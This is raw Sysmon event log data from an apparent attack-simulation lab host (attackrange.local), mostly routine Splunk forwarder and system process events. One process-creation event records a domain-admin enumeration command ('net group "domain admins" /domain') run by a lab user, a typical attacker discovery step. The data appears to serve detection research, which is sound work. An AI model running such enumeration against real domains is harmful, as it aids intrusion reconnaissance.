21:58:10.201{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8372-613A-D096-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.201{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8372-613A-D096-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:10.186{B81B27B7-8372-613A-D096-03000000C801}2876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:11.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89098C6D1D37CCB3B829EC5333C92E28,SHA256=157B913257C7DDB5DC20632B5D125B635F5B858C0B3975D320CF304540632451,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:11.200{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3AE6E78713230E1DE0F4D7DD82273FB0,SHA256=D0C97DB96904D6570F64E254E29E9CCD5280E82585367842886BB2F8E96EEB61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:11.200{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68E585A04D7756B169B134D6DFA201A6,SHA256=1E2934A621AB081B50650AE8AAC2632C17690C40D8780F3FC1ECE0CC5B42AED9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:12.448{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=149C777E22C3BDD6DC74EFE9750C3ADC,SHA256=D553AA2DB0DDED8E9F6484C774FFE6C2950B25BEC8E30C98D17F1421CFCA991A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:37.256{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62139-false10.0.1.12-8000- 23542300x800000000000000035128328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:13.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE2A79FA1A8A80B461111D00BBBC18E4,SHA256=E386DAA5713841F65CE1D2835B8AB9DD92E28D04CBFFAA6862927AEA256D1727,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20982921E8D1A7FB6BCF5F035C70172,SHA256=0B48B20D96EA722D077E9556F3DE02923F1229C4294ED8B3C9E0CFB5AF659C84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.129{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.129{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.129{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.129{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000035128347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\system32\net1.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0B00-00000000C801}6362588C:\Windows\system32\lsass.exe{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\system32\net1.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.114{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-8376-613A-D296-03000000C801}67243600C:\Windows\system32\net.exe{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\system32\net1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\net.exe+240f|C:\Windows\system32\net.exe+1883|C:\Windows\system32\net.exe+163b|C:\Windows\system32\net.exe+1375|C:\Windows\system32\net.exe+26fd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.113{B81B27B7-8376-613A-D396-03000000C801}4504C:\Windows\System32\net1.exe10.0.14393.0 (rs1_release.160715-1616)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet1.exeC:\Windows\system32\net1 group "domain admins" /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=946383ED00F5CD92DBCB7CDB878ED819,SHA256=E92A2FA67AD2F7367ABA1ABF237D245B5E36291C5A4A9F0FC04B3A0E32FF618E,IMPHASH=E2F26A4CA577CF6DBACE937727934F80{B81B27B7-8376-613A-D296-03000000C801}6724C:\Windows\System32\net.exe"C:\Windows\system32\net.exe" group "domain admins" /domain 10341000x800000000000000035128337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-8376-613A-D296-03000000C801}6724C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:14.098{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 